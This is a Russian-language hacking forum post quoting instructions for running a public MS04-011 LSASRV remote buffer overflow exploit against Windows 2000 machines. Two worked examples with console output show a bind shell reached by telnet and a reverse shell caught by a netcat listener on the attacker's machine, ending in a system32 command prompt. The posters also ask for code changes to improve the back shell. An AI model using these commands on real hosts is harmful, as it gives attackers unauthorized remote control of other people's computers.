Цитата |
---|
Гость пишет: 2 > [SpDOMINANT] да просто, смотри : <target> <victim IP> <bindport> [connectback IP] [options] target = ось victim IP = дырявая тачка <bindport> = номер порта [connectback IP] = твой айпи варианты эксплуатации: 1)если ты не указываешь [connectback IP], то после эксплуатации коннктишься на bindport дырявой тачки 2)если ты указываешь [connectback IP], то предварительно ставишь неткат слушать <bindport> (и к тебе на <bindport> дропается шел) Пример 1: ======================================= С:\>HOD-ms04011-lsasrv-expl.exe 2 10.0.ххх.ххх 3333 MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 --- Coded by .::[ houseofdabus ]::. --- [*] Target: IP: 10.0.ххх.ххх: OS: Win2k Advanced Server [SP4] netrap.dll [*] Connecting to 10.0.ххх.ххх:445 ... OK [*] Attacking ... OK c:\telnet 10.0.xxx.xxx 3333 Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-2000 Microsoft Corp. E:\WINNT\system32> Пример 2: ======================================= (на своей машине) С:\>nc -l -n -vv -p 3333 listening on [any] 3333 ... С:\>HOD-ms04011-lsasrv-expl.exe 2 10.0.ххх.ххх 3333 10.0.yyy.yyy MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 --- Coded by .::[ houseofdabus ]::. --- [*] Target: IP: 10.0.ххх.ххх: OS: Win2k Advanced Server [SP4] netrap.dll [*] Connecting to 10.0.25.ххх:ххх:445 ... OK [*] Attacking ... OK в окне в nc: H:\>nc -l -n -vv -p 3333 listening on [any] 3333 ... connect to [10.0.yyy.yyy] from (UNKNOWN) [10.0.xxx.xxx] 2738 Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-2000 Microsoft Corp. E:\WINNT\system32> вот собственно и всё ... Люди, кто умееет программировать и кому не жалко своего времени а так же жаба не задушит потом делиться ... добишите, пожалуйста, код, чтобы можно было указывать еще изходящий порт для бэк шела =) |
a vot reverse shell i ne rabotaet... ibo netcat port zanimaet i drugoi komp connect sdelat' na mozet... no esli nemnogo dopisat' isxodnik to vse na URA!